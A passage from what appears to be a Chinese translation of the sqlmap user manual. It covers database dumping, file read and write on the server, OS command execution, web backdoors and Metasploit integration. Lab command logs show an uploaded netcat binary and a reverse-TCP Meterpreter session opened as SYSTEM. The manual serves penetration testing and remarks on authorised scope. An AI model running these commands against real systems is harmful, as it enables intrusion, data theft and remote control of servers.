|\n+----+--------+------------+<\/code><\/pre>\n<p>\u53ef\u4ee5\u83b7\u53d6\u6307\u5b9a\u5e93\u4e2d\u7684\u6240\u6709\u8868\u7684\u5185\u5bb9\uff0c\u53ea\u7528&#8211;dump\u8ddf-D\u53c2\u6570\uff08\u4e0d\u4f7f\u7528-T\u4e0e-C\u53c2\u6570\uff09\u3002<\/p>\n<p>\u4e5f\u53ef\u4ee5\u7528&#8211;dump\u8ddf-C\u83b7\u53d6\u6307\u5b9a\u7684\u5b57\u6bb5\u5185\u5bb9\u3002<\/p>\n<p>sqlmap\u4e3a\u6bcf\u4e2a\u8868\u751f\u6210\u4e86\u4e00\u4e2aCSV\u6587\u4ef6\uff08\u9ed8\u8ba4\u4fdd\u5b58\u5728sqlmap\u7684output\u76ee\u5f55\u4e0b\uff0c\u5176\u4e2d\u5f80\u5f80\u542b\u6709\u654f\u611f\u6570\u636e\uff0c\u6d4b\u8bd5\u7ed3\u675f\u540e\u5e94\u6309\u6388\u6743\u8303\u56f4\u59a5\u5584\u5904\u7406\uff09\u3002<\/p>\n<p>\u5982\u679c\u4f60\u53ea\u60f3\u83b7\u53d6\u4e00\u6bb5\u6570\u636e\uff0c\u53ef\u4ee5\u4f7f\u7528&#8211;start\u548c&#8211;stop\u53c2\u6570\uff0c\u4f8b\u5982\uff0c\u4f60\u53ea\u60f3\u83b7\u53d6\u7b2c\u4e00\u6bb5\u6570\u636e\u53ef\u4ee5\u4f7f\u7528&#8211;stop 1\uff0c\u5982\u679c\u60f3\u83b7\u53d6\u7b2c\u4e8c\u6bb5\u4e0e\u7b2c\u4e09\u6bb5\u6570\u636e\uff0c\u4f7f\u7528\u53c2\u6570 &#8211;start 1 &#8211;stop 3\u3002<\/p>\n<p>\u4e5f\u53ef\u4ee5\u7528&#8211;first\u4e0e&#8211;last\u53c2\u6570\uff0c\u83b7\u53d6\u7b2c\u51e0\u4e2a\u5b57\u7b26\u5230\u7b2c\u51e0\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u5982\u679c\u4f60\u60f3\u83b7\u53d6\u5b57\u6bb5\u4e2d\u7b2c\u4e09\u4e2a\u5b57\u7b26\u5230\u7b2c\u4e94\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u4f7f\u7528&#8211;first 3 &#8211;last 5\uff0c\u53ea\u5728\u76f2\u6ce8\u7684\u65f6\u5019\u4f7f\u7528\uff0c\u56e0\u4e3a\u5176\u4ed6\u65b9\u5f0f\u53ef\u4ee5\u51c6\u786e\u7684\u83b7\u53d6\u6ce8\u5165\u5185\u5bb9\uff0c\u4e0d\u9700\u8981\u4e00\u4e2a\u5b57\u7b26\u4e00\u4e2a\u5b57\u7b26\u7684\u731c\u89e3\u3002<\/p>\n<h2>\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;dump-all,&#8211;exclude-sysdbs<\/p>\n<p>\u4f7f\u7528&#8211;dump-all\u53c2\u6570\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9\uff0c\u53ef\u540c\u65f6\u52a0\u4e0a&#8211;exclude-sysdbs\u53ea\u83b7\u53d6\u7528\u6237\u6570\u636e\u5e93\u7684\u8868\uff0c\u9700\u8981\u6ce8\u610f\u5728Microsoft SQL 
Server\u4e2d<\/p>\n<p>master\u6570\u636e\u5e93\u6ca1\u6709\u8003\u8651\u6210\u4e3a\u4e00\u4e2a\u7cfb\u7edf\u6570\u636e\u5e93\uff0c\u56e0\u4e3a\u6709\u7684\u7ba1\u7406\u5458\u4f1a\u628a\u5b83\u5f53\u4f5c\u7528\u6237\u6570\u636e\u5e93\u4e00\u6837\u6765\u4f7f\u7528\u3002<\/p>\n<h2>\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;search,-C,-T,-D<\/p>\n<p>&#8211;search\u53ef\u4ee5\u7528\u6765\u5bfb\u627e\u7279\u5b9a\u7684\u6570\u636e\u5e93\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u4e2d\u7684\u7279\u5b9a\u8868\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u7684\u7279\u5b9a\u5b57\u6bb5\u3002<\/p>\n<p>\u53ef\u4ee5\u5728\u4ee5\u4e0b\u4e09\u79cd\u60c5\u51b5\u4e0b\u4f7f\u7528<\/p>\n<blockquote>\n<p>-C\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5217\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5217\u540d\u3002<\/p>\n<p>-T\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u8868\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u8868\u540d\u3002<\/p>\n<p>-D\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5e93\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5e93\u540d\u3002<\/p>\n<\/blockquote>\n<h2>\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;sql-query,&#8211;sql-shell<\/p>\n<p>sqlmap\u4f1a\u81ea\u52a8\u68c0\u6d4b\u786e\u5b9a\u4f7f\u7528\u54ea\u79cdSQL\u6ce8\u5165\u6280\u672f\uff0c\u5982\u4f55\u63d2\u5165\u68c0\u7d22\u8bed\u53e5\u3002<\/p>\n<p>\u5982\u679c\u662fSELECT\u67e5\u8be2\u8bed\u53e5\uff0csqlmap\u5c06\u4f1a\u8f93\u51fa\u7ed3\u679c\u3002\u5982\u679c\u662f\u901a\u8fc7SQL\u6ce8\u5165\u6267\u884c\u5176\u4ed6\u8bed\u53e5\uff0c\u9700\u8981\u6d4b\u8bd5\u662f\u5426\u652f\u6301\u591a\u8bed\u53e5\u6267\u884cSQL\u8bed\u53e5\uff08\u975eSELECT\u8bed\u53e5\u4f1a\u4fee\u6539\u76ee\u6807\u6570\u636e\uff0c\u52a1\u5fc5\u5728\u6388\u6743\u8303\u56f4\u5185\u6267\u884c\uff09\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aMicrosoft SQL Server 
2000\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1\" --sql-query \"SELECT 'foo'\" -v 1\n[...]\n[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''\n[hh:mm:14] [INFO] retrieved: foo\nSELECT 'foo': 'foo'\n$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1\" --sql-query \"SELECT 'foo', 'bar'\"\n-v 2\n[...]\n[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''\n[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into\ndistinct queries to be able to retrieve the output even if we are going blind\n[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)),\n(CHAR(32)))\n[hh:mm:50] [INFO] retrieved: foo\n[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds\n[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)),\n(CHAR(32)))\n[hh:mm:50] [INFO] retrieved: bar\n[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds\nSELECT 'foo', 'bar': 'foo, bar'<\/code><\/pre>\n<h1>\u7206\u7834<\/h1>\n<h2>\u66b4\u529b\u7834\u89e3\u8868\u540d<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;common-tables<\/p>\n<p>\u5f53\u4f7f\u7528&#8211;tables\u65e0\u6cd5\u83b7\u53d6\u5230\u6570\u636e\u5e93\u7684\u8868\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/p>\n<p>\u901a\u5e38\u662f\u5982\u4e0b\u60c5\u51b5\uff1a<\/p>\n<blockquote>\n<p>1\u3001MySQL\u6570\u636e\u5e93\u7248\u672c\u5c0f\u4e8e5.0\uff0c\u6ca1\u6709information_schema\u8868\u3002<\/p>\n<p>2\u3001\u6570\u636e\u5e93\u662fMicrossoft 
Access\uff0c\u7cfb\u7edf\u8868MSysObjects\u662f\u4e0d\u53ef\u8bfb\u7684\uff08\u9ed8\u8ba4\uff09\u3002<\/p>\n<p>3\u3001\u5f53\u524d\u7528\u6237\u6ca1\u6709\u6743\u9650\u8bfb\u53d6\u7cfb\u7edf\u4e2d\u4fdd\u5b58\u6570\u636e\u7ed3\u6784\u7684\u8868\u7684\u6743\u9650\u3002<\/p>\n<\/blockquote>\n<p>\u66b4\u529b\u7834\u89e3\u7684\u8868\u5728txt\/common-tables.txt\u6587\u4ef6\u4e2d\uff0c\u4f60\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aMySQL 4.1\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.129\/mysql\/get_int_4.php?id=1\" --common-tables -D testdb --banner\n[...]\n[hh:mm:39] [INFO] testing MySQL\n[hh:mm:39] [INFO] confirming MySQL\n[hh:mm:40] [INFO] the back-end DBMS is MySQL\n[hh:mm:40] [INFO] fetching banner\nweb server operating system: Windows\nweb application technology: PHP 5.3.1, Apache 2.2.14\nback-end DBMS operating system: Windows\nback-end DBMS: MySQL &amp;lt; 5.0.0\nbanner: '4.1.21-community-nt'\n[hh:mm:40] [INFO] checking table existence using items from '\/software\/sqlmap\/txt\/common-tables.txt'\n[hh:mm:40] [INFO] adding words used on web page to the check list\nplease enter number of threads? 
[Enter for 1 (current)] 8\n[hh:mm:43] [INFO] retrieved: users\nDatabase: testdb\n[1 table]\n+-------+\n| users |\n+-------+<\/code><\/pre>\n<h2>\u66b4\u529b\u7834\u89e3\u5217\u540d<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;common-columns<\/p>\n<p>\u4e0e\u66b4\u529b\u7834\u89e3\u8868\u540d\u4e00\u6837\uff0c\u66b4\u529b\u8dd1\u7684\u5217\u540d\u5728txt\/common-columns.txt\u4e2d\u3002<\/p>\n<h1>\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165<\/h1>\n<p>\u53c2\u6570\uff1a&#8211;udf-inject,&#8211;shared-lib<\/p>\n<p>\u4f60\u53ef\u4ee5\u901a\u8fc7\u7f16\u8bd1MySQL\u6ce8\u5165\u4f60\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff08UDFs\uff09\u6216PostgreSQL\u5728windows\u4e2d\u5171\u4eab\u5e93\uff0cDLL\uff0c\u6216\u8005Linux\/Unix\u4e2d\u5171\u4eab\u5bf9\u8c61\uff0csqlmap\u5c06\u4f1a<\/p>\n<p>\u95ee\u4f60\u4e00\u4e9b\u95ee\u9898\uff0c\u4e0a\u4f20\u5230\u670d\u52a1\u5668\u6570\u636e\u5e93\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u7136\u540e\u6839\u636e\u4f60\u7684\u9009\u62e9\u6267\u884c\u4ed6\u4eec\uff0c\u5f53\u4f60\u6ce8\u5165\u5b8c\u6210\u540e\uff0csqlmap\u5c06\u4f1a\u79fb\u9664\u5b83\u4eec\u3002<\/p>\n<h1>\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c<\/h1>\n<h2>\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;file-read<\/p>\n<p>\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u8bfb\u53d6\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587<\/p>\n<p>\u4ef6\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aMicrosoft SQL Server 2005\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.129\/sqlmap\/mssql\/iis\/get_str2.asp?name=luther\" \n--file-read \"C:\/example.exe\" -v 1\n[...]\n[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server\nweb server operating system: Windows 
2000\nweb application technology: ASP.NET, Microsoft IIS 6.0, ASP\nback-end DBMS: Microsoft SQL Server 2005\n[hh:mm:50] [INFO] fetching file: 'C:\/example.exe'\n[hh:mm:50] [INFO] the SQL query provided returns 3 entries\nC:\/example.exe file saved to: '\/software\/sqlmap\/output\/192.168.136.129\/files\/C__example.exe'\n[...]\n$ ls -l output\/192.168.136.129\/files\/C__example.exe\n-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output\/192.168.136.129\/files\/C__example.exe\n$ file output\/192.168.136.129\/files\/C__example.exe\noutput\/192.168.136.129\/files\/C__example.exe: PE32 executable for MS Windows (GUI) Intel\n80386 32-bit<\/code><\/pre>\n<h2>\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;file-write,&#8211;file-dest<\/p>\n<p>\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u4e0a\u4f20\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587<\/p>\n<p>\u4ef6\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aMySQL\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ file \/software\/nc.exe.packed\n\/software\/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit\n$ ls -l \/software\/nc.exe.packed\n-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm \/software\/nc.exe.packed\n$ python sqlmap.py -u \"http:\/\/192.168.136.129\/sqlmap\/mysql\/get_int.aspx?id=1\" --file-write \n\"\/software\/nc.exe.packed\" --file-dest \"C:\/WINDOWS\/Temp\/nc.exe\" -v 1\n[...]\n[hh:mm:29] [INFO] the back-end DBMS is MySQL\nweb server operating system: Windows 2003 or 2008\nweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727\nback-end DBMS: MySQL &amp;gt;= 5.0.0\n[...]\ndo you want confirmation that the file 'C:\/WINDOWS\/Temp\/nc.exe' has been 
successfully\nwritten on the back-end DBMS file system? [Y\/n] y\n[hh:mm:52] [INFO] retrieved: 31744\n[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,\nsame size as the local file '\/software\/nc.exe.packed'<\/code><\/pre>\n<h2>\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;os-cmd,&#8211;os-shell<\/p>\n<p>\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002<\/p>\n<p>\u5728MySQL\u3001PostgreSQL\uff0csqlmap\u4e0a\u4f20\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5e93\uff0c\u5305\u542b\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff0csys_exec()\u548csys_eval()\u3002<\/p>\n<p>\u90a3\u4e48\u4ed6\u521b\u5efa\u7684\u8fd9\u4e24\u4e2a\u51fd\u6570\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002\u5728Microsoft SQL Server\uff0csqlmap\u5c06\u4f1a\u4f7f\u7528xp_cmdshell\u5b58\u50a8\u8fc7\u7a0b\uff0c\u5982\u679c\u88ab\u7981\uff08\u5728Microsoft<\/p>\n<p>SQL Server 2005\u53ca\u4ee5\u4e0a\u7248\u672c\u9ed8\u8ba4\u7981\u5236\uff09\uff0csqlmap\u4f1a\u91cd\u65b0\u542f\u7528\u5b83\uff0c\u5982\u679c\u4e0d\u5b58\u5728\uff0c\u4f1a\u81ea\u52a8\u521b\u5efa\u3002<\/p>\n<p>\u5217\u4e3e\u4e00\u4e2aPostgreSQL\u7684\u4f8b\u5b50\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-markdown\">$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1\" \n--os-cmd id -v 1\n[...]\nweb application technology: PHP 5.2.6, Apache 2.2.9\nback-end DBMS: PostgreSQL\n[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system\n[hh:mm:12] [INFO] the back-end DBMS operating system is Linux\n[hh:mm:12] [INFO] testing if current user is DBA\n[hh:mm:12] [INFO] detecting back-end DBMS version from its banner\n[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist\n[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist\n[hh:mm:12] [INFO] 
creating UDF 'sys_eval' from the binary UDF file\n[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file\ndo you want to retrieve the command standard output? [Y\/n\/a] y\ncommand standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'\n[hh:mm:19] [INFO] cleaning up the database management system\ndo you want to remove UDF 'sys_eval'? [Y\/n] y\ndo you want to remove UDF 'sys_exec'? [Y\/n] y\n[hh:mm:23] [INFO] database management system cleanup finished\n[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can\nonly be deleted manually<\/code><\/pre>\n<p>\u7528&#8211;os-shell\u53c2\u6570\u4e5f\u53ef\u4ee5\u6a21\u62df\u4e00\u4e2a\u771f\u5b9e\u7684shell\uff0c\u53ef\u4ee5\u8f93\u5165\u4f60\u60f3\u6267\u884c\u7684\u547d\u4ee4<\/p>\n<p>\u5f53\u4e0d\u80fd\u6267\u884c\u591a\u8bed\u53e5\u7684\u65f6\u5019\uff08\u6bd4\u5982php\u6216\u8005asp\u7684\u540e\u7aef\u6570\u636e\u5e93\u4e3aMySQL\u65f6\uff09\uff0c\u4ecd\u7136\u53ef\u80fd\u4f7f\u7528INTO OUTFILE\u5199\u8fdb\u53ef\u5199\u76ee\u5f55\uff0c\u6765\u521b\u5efa\u4e00\u4e2aweb\u540e\u95e8\u3002\u652f\u6301\u7684\u8bed\u8a00\uff1a<\/p>\n<blockquote>\n<p>1\u3001ASP<\/p>\n<p>2\u3001ASP.NET<\/p>\n<p>3\u3001JSP<\/p>\n<p>4\u3001PHP<\/p>\n<\/blockquote>\n<h2>Meterpreter\u914d\u5408\u4f7f\u7528<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;os-pwn,&#8211;os-smbrelay,&#8211;os-bof,&#8211;priv-esc,&#8211;msf-path,&#8211;tmp-path<\/p>\n<p>\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL 
Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\uff0c\u53ef\u4ee5\u5728\u6570\u636e\u5e93\u4e0e\u653b\u51fb\u8005\u76f4\u63a5\u5efa\u7acbTCP\u8fde\u63a5\uff0c\u8fd9\u4e2a\u8fde\u63a5\u53ef\u4ee5\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u547d\u4ee4\u884c\u7684Meterpreter\u4f1a\u8bdd\uff0csqlmap\u6839\u636eMetasploit\u751f\u6210shellcode\uff0c\u5e76\u6709\u56db\u79cd\u65b9\u5f0f\u6267\u884c\u5b83\uff1a<\/p>\n<blockquote>\n<p>1\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684sys_bineval()\u51fd\u6570\u5728\u5185\u5b58\u4e2d\u6267\u884cMetasplit\u7684shellcode\uff0c\u652f\u6301MySQL\u548cPostgreSQL\u6570\u636e\u5e93\uff0c\u53c2\u6570\uff1a&#8211;os-pwn\u3002<\/p>\n<p>2\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\u4e0a\u4f20\u4e00\u4e2a\u72ec\u7acb\u7684payload\u6267\u884c\uff0cMySQL\u548cPostgreSQL\u7684sys_exec()\u51fd\u6570\uff0cMicrosoft SQL Server\u7684<\/p>\n<p>xp_cmdshell()\u51fd\u6570\uff0c\u53c2\u6570\uff1a&#8211;os-pwn\u3002<\/p>\n<p>3\u3001\u901a\u8fc7SMB\u653b\u51fb(MS08-068)\u6765\u6267\u884cMetasploit\u7684shellcode\uff0c\u5f53sqlmap\u83b7\u53d6\u5230\u7684\u6743\u9650\u8db3\u591f\u9ad8\u7684\u65f6\u5019\uff08Linux\/Unix\u7684uid=0\uff0cWindows\u662f<\/p>\n<p>Administrator\uff09\uff0c&#8211;os-smbrelay\u3002<\/p>\n<p>4\u3001\u901a\u8fc7\u6ea2\u51faMicrosoft SQL Server 2000\u548c2005\u7684sp_replwritetovarbin\u5b58\u50a8\u8fc7\u7a0b(MS09-004)\uff0c\u5728\u5185\u5b58\u4e2d\u6267\u884cMetasploit\u7684payload\uff0c<\/p>\n<p>\u53c2\u6570\uff1a&#8211;os-bof<\/p>\n<\/blockquote>\n<p>\u5217\u4e3e\u4e00\u4e2aMySQL\u4f8b\u5b50<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-python\">$ python sqlmap.py -u \"http:\/\/192.168.136.129\/sqlmap\/mysql\/iis\/get_int_55.aspx?id=1\" --os-pwn --msf-path\n\/software\/metasploit\n[...]\n[hh:mm:31] [INFO] the back-end DBMS is MySQL\nweb server operating system: Windows 2003\nweb application technology: ASP.NET, ASP.NET 4.0.30319, 
Microsoft IIS 6.0\nback-end DBMS: MySQL 5.0\n[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system\n    [hh:mm:31] [INFO] the back-end DBMS operating system is Windows\nhow do you want to establish the tunnel?\n[1] TCP: Metasploit Framework (default)\n[2] ICMP: icmpsh - ICMP tunneling\n&amp;gt;\n[hh:mm:32] [INFO] testing if current user is DBA\n[hh:mm:32] [INFO] fetching current user\nwhat is the back-end database management system architecture?\n[1] 32-bit (default)\n[2] 64-bit\n&amp;gt;\n[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist\n    [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist\n[hh:mm:33] [INFO] detecting back-end DBMS version from its banner\n[hh:mm:33] [INFO] retrieving MySQL base directory absolute path\n[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file\n[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file\nhow do you want to execute the Metasploit shellcode on the back-end database underlying\noperating system?\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)\n[2] Stand-alone payload stager (file system way)\n&amp;gt;\n[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode\nwhich connection type do you want to use?\n[1] Reverse TCP: Connect back from the database host to this machine (default)\n[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports\nbetween the specified and 65535\n[3] Bind TCP: Listen on the database host for a connection\n&amp;gt;\nwhich is the local address? [192.168.136.1]\nwhich local port number do you want to use? [60641]\nwhich payload do you want to use?\n[1] Meterpreter (default)\n[2] Shell\n[3] VNC\n&amp;gt;\n[hh:mm:40] [INFO] creation in progress ... 
done\n[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..\n_\n| | o\n_ _ _ _ _|_ __, , _ | | __ _|_\n\/ |\/ |\/ | |\/ | \/ | \/ _|\/ _|\/ \/ _| |\n| | |_\/|__\/|_\/_\/|_\/ \/ |__\/ |__\/__\/ |_\/|_\/\n\/|\n|\n=[ metasploit v3.7.0-dev [core:3.7 api:1.0]\n+ -- --=[ 674 exploits - 351 auxiliary\n+ -- --=[ 217 payloads - 27 encoders - 8 nops\n=[ svn r12272 updated 4 days ago (2011.04.07)\nPAYLOAD =&amp;gt; windows\/meterpreter\/reverse_tcp\nEXITFUNC =&amp;gt; thread\nLPORT =&amp;gt; 60641\nLHOST =&amp;gt; 192.168.136.1\n[*] Started reverse handler on 192.168.136.1:60641\n[*] Starting the payload handler...\n[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',\nplease wait..\n[*] Sending stage (749056 bytes) to 192.168.136.129\n[*] Meterpreter session 1 opened (192.168.136.1:60641 -&amp;gt; 192.168.136.129:1689) at Mon Apr 11\nhh:mm:52 +0100 2011\nmeterpreter &amp;gt; Loading extension espia...success.\nmeterpreter &amp;gt; Loading extension incognito...success.\nmeterpreter &amp;gt; [-] The 'priv' extension has already been loaded.\nmeterpreter &amp;gt; Loading extension sniffer...success.\nmeterpreter &amp;gt; System Language : en_US\nOS : Windows .NET Server (Build 3790, Service Pack 2).\nComputer : W2K3R2\nArchitecture : x86\nMeterpreter : x86\/win32\nmeterpreter &amp;gt; Server username: NT AUTHORITYSYSTEM\nmeterpreter &amp;gt; ipconfig\nMS TCP Loopback interface\nHardware MAC: 00:00:00:00:00:00\nIP Address : 127.0.0.1\nNetmask : 255.0.0.0\nIntel(R) PRO\/1000 MT Network Connection\nHardware MAC: 00:0c:29:fc:79:39\nIP Address : 192.168.136.129\nNetmask : 255.255.255.0\nmeterpreter &amp;gt; exit\n[*] Meterpreter session 1 closed. 
Reason: User exit<\/code><\/pre>\n<p>\u9ed8\u8ba4\u60c5\u51b5\u4e0bMySQL\u5728Windows\u4e0a\u4ee5SYSTEM\u6743\u9650\u8fd0\u884c\uff0cPostgreSQL\u5728Windows\u4e0eLinux\u4e2d\u662f\u4f4e\u6743\u9650\u8fd0\u884c\uff0cMicrosoft SQL Server 2000\u9ed8\u8ba4<\/p>\n<p>\u662f\u4ee5SYSTEM\u6743\u9650\u8fd0\u884c\uff0cMicrosoft SQL Server 2005\u4e0e2008\u5927\u90e8\u5206\u662f\u4ee5NETWORK SERVICE\u6709\u65f6\u662fLOCAL SERVICE\u3002<\/p>\n<p>\u300asqlmap\u7528\u6237\u624b\u518c\u300b\u5176\u5b9e\u53ea\u5199\u4e86\u5927\u90e8\u5206\u53ef\u80fd\u7528\u5230\u7684\u53c2\u6570<\/p>\n<h1>\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c<\/h1>\n<p>\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524dweb\u5e94\u7528\u652f\u6301\u5806\u67e5\u8be2\u3002 \u5f53\u7136\uff0c\u5f53\u524d\u8fde\u63a5\u6570\u636e\u5e93\u7684\u7528\u6237\u4e5f\u9700\u8981\u6709\u6743\u9650\u64cd\u4f5c\u6ce8\u518c\u8868<\/p>\n<h2>\u8bfb\u53d6\u6ce8\u518c\u8868\u503c<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;reg-read<\/p>\n<h2>\u5199\u5165\u6ce8\u518c\u8868\u503c<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;reg-add<\/p>\n<h2>\u5220\u9664\u6ce8\u518c\u8868\u503c<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;reg-del<\/p>\n<h2>\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879<\/h2>\n<p>\u53c2\u6570\uff1a&#8211;reg-key\uff0c&#8211;reg-value\uff0c&#8211;reg-data\uff0c&#8211;reg-type<\/p>\n<p>\u9700\u8981\u914d\u5408\u4e4b\u524d\u4e09\u4e2a\u53c2\u6570\u4f7f\u7528\uff0c\u4f8b\u5b50\uff1a$ python sqlmap.py -u <a href=\"http:\/\/192.168.136.129\/sqlmap\/pgsql\/get_int.aspx?id=1\">http:\/\/192.168.136.129\/sqlmap\/pgsql\/get_int.aspx?id=1<\/a> &#8211;reg-add &#8211;reg-<\/p>\n<p>key=&quot;HKEY_LOCAL_MACHINESOFTWAREsqlmap&quot; &#8211;reg-value=Test &#8211;reg-type=REG_SZ 
